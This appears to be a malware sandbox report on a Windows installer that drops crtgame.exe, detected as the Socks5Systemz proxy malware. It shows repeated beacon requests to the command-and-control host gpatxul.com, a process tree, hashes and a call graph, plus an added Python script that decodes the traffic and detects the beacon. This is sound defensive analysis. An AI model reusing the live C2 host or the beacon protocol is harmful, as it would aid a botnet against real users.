Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49942 | 185.237.206.129 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 12:04:02.196254969 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
Host: gpatxul.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 12:04:03.479429007 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 11:04:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   9 | 192.168.2.5 | 49948 | 185.237.206.129 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe

                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   Dec 14, 2024 12:04:03.725128889 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                       Host: gpatxul.com
                                                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                   Dec 14, 2024 12:04:05.047827005 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                       Server: nginx/1.20.1
                                                                                       Date: Sat, 14 Dec 2024 11:04:04 GMT
                                                                                       Content-Type: text/html; charset=UTF-8
                                                                                       Transfer-Encoding: chunked
                                                                                       Connection: keep-alive
                                                                                       X-Powered-By: PHP/7.4.33
                                                                                       Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                       Data Ascii: ede2ff49a2e11370


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   10 | 192.168.2.5 | 49951 | 185.237.206.129 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe

                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   Dec 14, 2024 12:04:05.293818951 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                       Host: gpatxul.com
                                                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                   Dec 14, 2024 12:04:06.699769020 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                       Server: nginx/1.20.1
                                                                                       Date: Sat, 14 Dec 2024 11:04:06 GMT
                                                                                       Content-Type: text/html; charset=UTF-8
                                                                                       Transfer-Encoding: chunked
                                                                                       Connection: keep-alive
                                                                                       X-Powered-By: PHP/7.4.33
                                                                                       Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                       Data Ascii: ede2ff49a2e11370


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   11 | 192.168.2.5 | 49955 | 185.237.206.129 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe

                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   Dec 14, 2024 12:04:06.958384991 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                       Host: gpatxul.com
                                                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                   Dec 14, 2024 12:04:08.238189936 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                       Server: nginx/1.20.1
                                                                                       Date: Sat, 14 Dec 2024 11:04:08 GMT
                                                                                       Content-Type: text/html; charset=UTF-8
                                                                                       Transfer-Encoding: chunked
                                                                                       Connection: keep-alive
                                                                                       X-Powered-By: PHP/7.4.33
                                                                                       Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                       Data Ascii: ede2ff49a2e11370


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   12 | 192.168.2.5 | 49961 | 185.237.206.129 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe

                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   Dec 14, 2024 12:04:08.474240065 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                       Host: gpatxul.com
                                                                                       User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                   Dec 14, 2024 12:04:09.749092102 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                       Server: nginx/1.20.1
                                                                                       Date: Sat, 14 Dec 2024 11:04:09 GMT
                                                                                       Content-Type: text/html; charset=UTF-8
                                                                                       Transfer-Encoding: chunked
                                                                                       Connection: keep-alive
                                                                                       X-Powered-By: PHP/7.4.33
                                                                                       Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                       Data Ascii: ede2ff49a2e11370
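The sessions above all carry the same 24-byte chunked reply. The report's "Data Ascii" line (ede2ff49a2e11370) is misleading on its own: it is the chunk framing ("e" = 14 bytes, then the terminating "0" chunk) glued to the payload with the CRLFs dropped, so the actual server response is the 14-byte string de2ff49a2e1137. The following Python is an added example, not part of the Joe Sandbox report or of the sample's own code: it reassembles session 8 from the request and response headers shown (CRLF line endings restored) plus the "Data Raw" bytes, checks that the reassembled sizes equal the report's 303/220 "Bytes transferred" counts, de-chunks the body, and matches the request shape seen in these sessions. The function names, the byte-count checks and the beacon check are this example's own; the beacon pattern is derived only from this report's captures.

```python
"""Reassemble crtgame.exe HTTP session 8 from the report above and decode its chunked reply.

Added example, not part of the Joe Sandbox report. The request and the response
headers are copied from session 8 (CRLF line endings restored); the body bytes are
that session's "Data Raw" hex. The function names, the beacon check and the
byte-count checks are this example's own.
"""
import re

# Session 8 request, as printed in the report
REQUEST = (
    b"GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1\r\n"
    b"Host: gpatxul.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\r\n"
    b"\r\n"
)

# Session 8 response headers, as printed in the report
RESPONSE_HEADERS = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx/1.20.1\r\n"
    b"Date: Sat, 14 Dec 2024 11:04:03 GMT\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: keep-alive\r\n"
    b"X-Powered-By: PHP/7.4.33\r\n"
    b"\r\n"
)

# "Data Raw" of session 8, exactly as printed in the report (the whole body)
DATA_RAW_HEX = "65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a"
RESPONSE = RESPONSE_HEADERS + bytes.fromhex(DATA_RAW_HEX)


def split_message(raw: bytes) -> tuple:
    """Split an HTTP/1.1 message into (start line, lowercase header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    start, *lines = head.split(b"\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return start.decode(), headers, body


def decode_chunked(body: bytes) -> bytes:
    """De-frame a chunked body (RFC 9112 section 7.1); raise on truncated or malformed framing.

    Each chunk is '<hex size>[;ext]\\r\\n<data>\\r\\n'; a zero-size chunk ends the body.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        size_field = body[pos:eol].split(b";", 1)[0].strip()
        if not re.fullmatch(rb"[0-9A-Fa-f]+", size_field):
            raise ValueError("bad chunk size %r" % size_field)
        size = int(size_field, 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)          # trailer section, if any, is ignored
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk shorter than declared or missing CRLF")
        out += chunk
        pos += size + 2


def response_payload(raw: bytes) -> bytes:
    """Return the application payload of a raw response, de-chunking if needed."""
    _, headers, body = split_message(raw)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        return decode_chunked(body)
    return body


# Request shape of these sessions; derived only from this report, not a published rule
BEACON_PATH = re.compile(r"^/click/\?counter=[0-9a-f]+$")


def looks_like_click_beacon(raw_request: bytes) -> bool:
    """GET /click/?counter=<hex> with a User-Agent claiming 'Windows NT 9.0',
    a version string no Windows release reports."""
    start, headers, _ = split_message(raw_request)
    parts = start.split(" ")
    if len(parts) != 3:
        return False
    method, path, _ = parts
    return (method == "GET" and BEACON_PATH.match(path) is not None
            and "Windows NT 9.0" in headers.get("user-agent", ""))


if __name__ == "__main__":
    print(len(REQUEST), len(RESPONSE))        # 303 220, the report's byte counts
    print(response_payload(RESPONSE))          # b'de2ff49a2e1137'
    print(looks_like_click_beacon(REQUEST))    # True
```

The size check is what ties the reconstruction to the capture: header block plus "Data Raw" comes to exactly 220 bytes, so the hex shown is the complete body and nothing was elided. The decoder refuses a body whose last chunk is cut off instead of silently returning a partial payload, which matters when a capture is truncated mid-stream.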


                                                                                  Target ID:0
                                                                                  Start time:06:02:02
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Users\user\Desktop\AGcC2uK0El.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\AGcC2uK0El.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:7'280'524 bytes
                                                                                  MD5 hash:3EC3E60970E2D0D38DF3B5E571E8514D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Target ID:1
                                                                                  Start time:06:02:02
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp" /SL5="$10480,7025884,54272,C:\Users\user\Desktop\AGcC2uK0El.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:704'000 bytes
                                                                                  MD5 hash:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:3
                                                                                  Start time:06:02:04
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\system32\schtasks.exe" /Query
                                                                                  Imagebase:0x350000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:06:02:04
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:06:02:04
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                                                                                  Imagebase:0x400000
                                                                                  File size:2'207'670 bytes
                                                                                  MD5 hash:3362BAC458070E33D0CABCDA1E4B735C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:06:02:05
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\system32\net.exe" helpmsg 10
                                                                                  Imagebase:0xb20000
                                                                                  File size:47'104 bytes
                                                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:06:02:05
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                                                                                  Imagebase:0x400000
                                                                                  File size:2'207'670 bytes
                                                                                  MD5 hash:3362BAC458070E33D0CABCDA1E4B735C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3300804778.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:8
                                                                                  Start time:06:02:05
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:06:02:05
                                                                                  Start date:14/12/2024
                                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\net1 helpmsg 10
                                                                                  Imagebase:0x8c0000
                                                                                  File size:139'776 bytes
                                                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                    Execution Graph

                                                                                    Execution Coverage:21%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:2.4%
                                                                                    Total number of Nodes:1497
                                                                                    Total number of Limit Nodes:22
                                                                                     execution_graph (edge list behind the rendered graph, truncated in the report; node and edge numbering dropped). Nodes annotated with API calls, by address:
                                                                                       4030e1  GetModuleHandleA, GetCommandLineA
                                                                                       403120  LocalAlloc
                                                                                       40313e  TlsSetValue
                                                                                       403174  TlsGetValue
                                                                                       40318c  TlsGetValue
                                                                                       4031b8  LocalAlloc, TlsSetValue, TlsGetValue, TlsGetValue
                                                                                       4031e8  LocalAlloc, TlsSetValue, TlsGetValue, TlsGetValue
                                                                                       4033b4  LocalAlloc, TlsSetValue, TlsGetValue, TlsGetValue
                                                                                       403418  LoadLibraryA
                                                                                       403454  LocalAlloc, TlsSetValue, TlsGetValue, TlsGetValue
                                                                                       40374c  VariantClear
                                                                                       4037f4  VariantClear, VariantChangeTypeEx, VariantChangeTypeEx
                                                                                       40457c  GetModuleHandleA, GetProcAddress
                                                                                       40459f  GetProcAddress
                                                                                       4045b5  GetProcAddress
                                                                                       4045c4  SetProcessDEPPolicy
                                                                                       404ccc  LocalAlloc, TlsSetValue, TlsGetValue, TlsGetValue, LoadStringA
                                                                                       4051fc  LocalAlloc, TlsSetValue, TlsGetValue, TlsGetValue, GetLocaleInfoA
                                                                                       405248  GetLocaleInfoA
                                                                                       405270  GetSystemDefaultLCID
                                                                                       4053b4  GetSystemDefaultLCID
                                                                                       405ce4  GetVersionExA
                                                                                       406604  call to 6F541CD0
                                                                                       406bd0  GetCommandLineA
                                                                                       406c53  GetModuleFileNameA
                                                                                       406c77  GetCommandLineA
                                                                                       406fa0  SetErrorMode
                                                                                       407284  FormatMessageA
                                                                                       40748c  GetLastError
                                                                                       4075b7  CreateFileA
                                                                                       407918  InterlockedExchange
                                                                                       4090a4  GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress
                                                                                       409b30  GetSystemInfo, VirtualQuery
                                                                                       409b84  VirtualProtect
                                                                                       409bb3  VirtualProtect
                                                                                       409bc5  VirtualQuery
                                                                                       409bec  FindResourceA
                                                                                       409c06  SizeofResource
                                                                                       409c18  LoadResource
                                                                                       409c2b  LockResource
5449->5448 5451 407c70 5450->5451 5452 407caf 5450->5452 5451->5452 5454 407bac 5451->5454 5452->5442 5452->5445 5455 407bb7 5454->5455 5456 407bc8 5454->5456 5458 405880 4 API calls 5455->5458 5457 4074a0 20 API calls 5456->5457 5459 407bdc 5457->5459 5458->5456 5460 4074a0 20 API calls 5459->5460 5461 407bfd 5460->5461 5462 407918 InterlockedExchange 5461->5462 5463 407c12 5462->5463 5464 407c28 5463->5464 5465 405880 4 API calls 5463->5465 5464->5451 5465->5464 5467 4078d6 5466->5467 5468 4078e7 5466->5468 5469 4078db InterlockedExchange 5467->5469 5468->5014 5469->5468 6242 409e47 6243 409e6c 6242->6243 6244 4098f4 15 API calls 6243->6244 6247 409e71 6244->6247 6245 409ec4 6276 4026c4 GetSystemTime 6245->6276 6247->6245 6251 408dd8 4 API calls 6247->6251 6248 409ec9 6249 409330 32 API calls 6248->6249 6250 409ed1 6249->6250 6252 4031e8 4 API calls 6250->6252 6253 409ea0 6251->6253 6254 409ede 6252->6254 6256 409ea8 MessageBoxA 6253->6256 6255 406928 5 API calls 6254->6255 6257 409eeb 6255->6257 6256->6245 6258 409eb5 6256->6258 6259 4066c0 5 API calls 6257->6259 6260 405854 5 API calls 6258->6260 6261 409efb 6259->6261 6260->6245 6262 406638 5 API calls 6261->6262 6263 409f0c 6262->6263 6264 403340 4 API calls 6263->6264 6265 409f1a 6264->6265 6266 4031e8 4 API calls 6265->6266 6267 409f2a 6266->6267 6268 4074e0 23 API calls 6267->6268 6269 409f69 6268->6269 6270 402594 4 API calls 6269->6270 6271 409f89 6270->6271 6272 407a28 5 API calls 6271->6272 6273 409fcb 6272->6273 6274 407cb8 21 API calls 6273->6274 6275 409ff2 6274->6275 6276->6248 6203 407548 6204 407554 CloseHandle 6203->6204 6205 40755d 6203->6205 6204->6205 6655 402b48 RaiseException 6206 407749 6207 4076dc WriteFile 6206->6207 6213 407724 6206->6213 6208 4076e8 6207->6208 6209 4076ef 6207->6209 6210 40748c 21 API calls 6208->6210 6211 407700 6209->6211 6212 4073ec 20 API calls 6209->6212 6210->6209 6212->6211 6213->6206 6214 4077e0 6213->6214 6215 4078db InterlockedExchange 6214->6215 6217 407890 
6214->6217 6216 4078e7 6215->6216 6656 40294a 6657 402952 6656->6657 6658 403554 4 API calls 6657->6658 6659 402967 6657->6659 6658->6657 6660 403f4a 6661 403f53 6660->6661 6663 403f5c 6660->6663 6664 403f07 6661->6664 6667 403f09 6664->6667 6666 403f3c 6666->6663 6668 403154 4 API calls 6667->6668 6670 403e9c 6667->6670 6673 403f3d 6667->6673 6687 403e9c 6667->6687 6668->6667 6669 403ef2 6672 402674 4 API calls 6669->6672 6670->6666 6670->6669 6676 403ea9 6670->6676 6678 403e8e 6670->6678 6675 403ecf 6672->6675 6673->6663 6675->6663 6676->6675 6677 402674 4 API calls 6676->6677 6677->6675 6679 403e4c 6678->6679 6680 403e62 6679->6680 6681 403e7b 6679->6681 6684 403e67 6679->6684 6682 403cc8 4 API calls 6680->6682 6683 402674 4 API calls 6681->6683 6682->6684 6685 403e78 6683->6685 6684->6685 6686 402674 4 API calls 6684->6686 6685->6669 6685->6676 6686->6685 6688 403ed7 6687->6688 6694 403ea9 6687->6694 6689 403ef2 6688->6689 6691 403e8e 4 API calls 6688->6691 6692 402674 4 API calls 6689->6692 6690 403ecf 6690->6667 6693 403ee6 6691->6693 6692->6690 6693->6689 6693->6694 6694->6690 6695 402674 4 API calls 6694->6695 6695->6690 6704 405150 6705 405163 6704->6705 6706 404e48 19 API calls 6705->6706 6707 405177 6706->6707 6277 403a52 6278 403a5a WriteFile 6277->6278 6280 403a74 6277->6280 6279 403a78 GetLastError 6278->6279 6278->6280 6279->6280 6281 402654 6282 403154 4 API calls 6281->6282 6283 402614 6282->6283 6284 402632 6283->6284 6285 403154 4 API calls 6283->6285 6285->6284 5652 409e62 5653 409aa0 4 API calls 5652->5653 5654 409e67 5653->5654 5655 409e6c 5654->5655 5755 402f24 5654->5755 5689 4098f4 5655->5689 5658 409ec4 5694 4026c4 GetSystemTime 5658->5694 5660 409e71 5660->5658 5760 408dd8 5660->5760 5661 409ec9 5695 409330 5661->5695 5665 4031e8 4 API calls 5667 409ede 5665->5667 5666 409ea0 5669 409ea8 MessageBoxA 5666->5669 5713 406928 5667->5713 5669->5658 5671 409eb5 5669->5671 5763 405854 5671->5763 5676 409f0c 5740 403340 5676->5740 5678 409f1a 
5679 4031e8 4 API calls 5678->5679 5680 409f2a 5679->5680 5681 4074e0 23 API calls 5680->5681 5682 409f69 5681->5682 5683 402594 4 API calls 5682->5683 5684 409f89 5683->5684 5685 407a28 5 API calls 5684->5685 5686 409fcb 5685->5686 5687 407cb8 21 API calls 5686->5687 5688 409ff2 5687->5688 5767 40953c 5689->5767 5694->5661 5698 409350 5695->5698 5699 409375 CreateDirectoryA 5698->5699 5703 408dd8 4 API calls 5698->5703 5708 407284 5 API calls 5698->5708 5712 405880 4 API calls 5698->5712 5859 406cf4 5698->5859 5882 409224 5698->5882 5901 404c84 5698->5901 5904 408da8 5698->5904 5700 4093ed 5699->5700 5701 40937f GetLastError 5699->5701 5702 40322c 4 API calls 5700->5702 5701->5698 5704 4093f7 5702->5704 5703->5698 5706 4031b8 4 API calls 5704->5706 5707 409411 5706->5707 5709 4031b8 4 API calls 5707->5709 5708->5698 5710 40941e 5709->5710 5710->5665 5712->5698 6014 406820 5713->6014 5716 403454 4 API calls 5717 40694a 5716->5717 5718 4066c0 5717->5718 6019 4068e4 5718->6019 5721 4066f0 5723 403340 4 API calls 5721->5723 5722 4066fe 5724 403454 4 API calls 5722->5724 5727 4066fc 5723->5727 5725 406711 5724->5725 5726 403340 4 API calls 5725->5726 5726->5727 5728 403198 4 API calls 5727->5728 5729 406733 5728->5729 5730 406638 5729->5730 5731 406642 5730->5731 5732 406665 5730->5732 6025 406950 5731->6025 5733 40322c 4 API calls 5732->5733 5735 40666e 5733->5735 5735->5676 5736 406649 5736->5732 5737 406654 5736->5737 5738 403340 4 API calls 5737->5738 5739 406662 5738->5739 5739->5676 5741 403344 5740->5741 5742 4033a5 5740->5742 5743 4031e8 5741->5743 5744 40334c 5741->5744 5745 4031fc 5743->5745 5748 403254 4 API calls 5743->5748 5744->5742 5749 4031e8 4 API calls 5744->5749 5750 40335b 5744->5750 5746 403228 5745->5746 5751 4025ac 4 API calls 5745->5751 5746->5678 5747 403254 4 API calls 5752 403375 5747->5752 5748->5745 5749->5750 5750->5747 5751->5746 5753 4031e8 4 API calls 5752->5753 5754 4033a1 5753->5754 5754->5678 5756 403154 4 API calls 5755->5756 5757 
402f29 5756->5757 6031 402bcc 5757->6031 5759 402f51 5759->5759 5761 408da8 4 API calls 5760->5761 5762 408df4 5761->5762 5762->5666 5764 405859 5763->5764 5765 405930 5 API calls 5764->5765 5766 40586b 5765->5766 5766->5766 5774 40955b 5767->5774 5768 409590 5770 40959d GetUserDefaultLangID 5768->5770 5775 409592 5768->5775 5769 409594 5785 407024 GetModuleHandleA GetProcAddress 5769->5785 5770->5775 5773 40956f 5779 409884 5773->5779 5774->5768 5774->5769 5774->5773 5775->5773 5776 4095cb GetACP 5775->5776 5777 4095ef 5775->5777 5776->5773 5776->5775 5777->5773 5778 409615 GetACP 5777->5778 5778->5773 5778->5777 5780 40988c 5779->5780 5784 4098c6 5779->5784 5781 403420 4 API calls 5780->5781 5780->5784 5782 4098c0 5781->5782 5843 408e80 5782->5843 5784->5660 5786 407067 5785->5786 5787 40705e 5785->5787 5788 407070 5786->5788 5789 4070a8 5786->5789 5798 403198 4 API calls 5787->5798 5806 406f68 5788->5806 5791 406f68 RegOpenKeyExA 5789->5791 5793 4070c1 5791->5793 5792 407089 5794 4070de 5792->5794 5809 406f5c 5792->5809 5793->5794 5795 406f5c 6 API calls 5793->5795 5796 40322c 4 API calls 5794->5796 5799 4070d5 RegCloseKey 5795->5799 5800 4070eb 5796->5800 5802 407120 5798->5802 5799->5794 5812 4032fc 5800->5812 5804 403198 4 API calls 5802->5804 5805 407128 5804->5805 5805->5775 5807 406f73 5806->5807 5808 406f79 RegOpenKeyExA 5806->5808 5807->5808 5808->5792 5826 406e10 5809->5826 5813 403300 5812->5813 5814 40333f 5812->5814 5815 4031e8 5813->5815 5816 40330a 5813->5816 5814->5787 5822 403254 4 API calls 5815->5822 5823 4031fc 5815->5823 5817 403334 5816->5817 5818 40331d 5816->5818 5819 4034f0 4 API calls 5817->5819 5820 4034f0 4 API calls 5818->5820 5825 403322 5819->5825 5820->5825 5821 403228 5821->5787 5822->5823 5823->5821 5824 4025ac 4 API calls 5823->5824 5824->5821 5825->5787 5827 406e36 RegQueryValueExA 5826->5827 5828 406e7b 5827->5828 5831 406e59 5827->5831 5830 403198 4 API calls 5828->5830 5829 406e73 5832 403198 4 API calls 5829->5832 5833 
406f47 RegCloseKey 5830->5833 5831->5828 5831->5829 5834 403278 4 API calls 5831->5834 5835 403420 4 API calls 5831->5835 5832->5828 5833->5794 5834->5831 5836 406eb0 RegQueryValueExA 5835->5836 5836->5827 5837 406ecc 5836->5837 5837->5828 5838 4034f0 4 API calls 5837->5838 5839 406f0e 5838->5839 5840 406f20 5839->5840 5842 403420 4 API calls 5839->5842 5841 4031e8 4 API calls 5840->5841 5841->5828 5842->5840 5844 408e8e 5843->5844 5846 408ea6 5844->5846 5856 408e18 5844->5856 5847 408e18 4 API calls 5846->5847 5848 408eca 5846->5848 5847->5848 5849 407918 InterlockedExchange 5848->5849 5850 408ee5 5849->5850 5851 408e18 4 API calls 5850->5851 5853 408ef8 5850->5853 5851->5853 5852 408e18 4 API calls 5852->5853 5853->5852 5854 403278 4 API calls 5853->5854 5855 408f27 5853->5855 5854->5853 5855->5784 5857 405880 4 API calls 5856->5857 5858 408e29 5857->5858 5858->5846 5908 406a58 5859->5908 5862 406d26 5864 406a58 5 API calls 5862->5864 5866 406d72 5862->5866 5865 406d36 5864->5865 5867 406d42 5865->5867 5869 406a34 7 API calls 5865->5869 5916 406888 5866->5916 5867->5866 5872 406a58 5 API calls 5867->5872 5878 406d67 5867->5878 5869->5867 5874 406d5b 5872->5874 5873 406638 5 API calls 5875 406d87 5873->5875 5876 406a34 7 API calls 5874->5876 5874->5878 5877 40322c 4 API calls 5875->5877 5876->5878 5879 406d91 5877->5879 5878->5866 5928 406cc8 GetWindowsDirectoryA 5878->5928 5880 4031b8 4 API calls 5879->5880 5881 406dab 5880->5881 5881->5698 5883 409244 5882->5883 5884 406638 5 API calls 5883->5884 5885 40925d 5884->5885 5886 40322c 4 API calls 5885->5886 5893 409268 5886->5893 5887 406978 6 API calls 5887->5893 5889 408dd8 4 API calls 5889->5893 5890 4033b4 4 API calls 5890->5893 5891 405880 4 API calls 5891->5893 5893->5887 5893->5889 5893->5890 5893->5891 5894 4092e4 5893->5894 5968 4091b0 5893->5968 5976 409034 5893->5976 5895 40322c 4 API calls 5894->5895 5896 4092ef 5895->5896 5897 4031b8 4 API calls 5896->5897 5898 409309 5897->5898 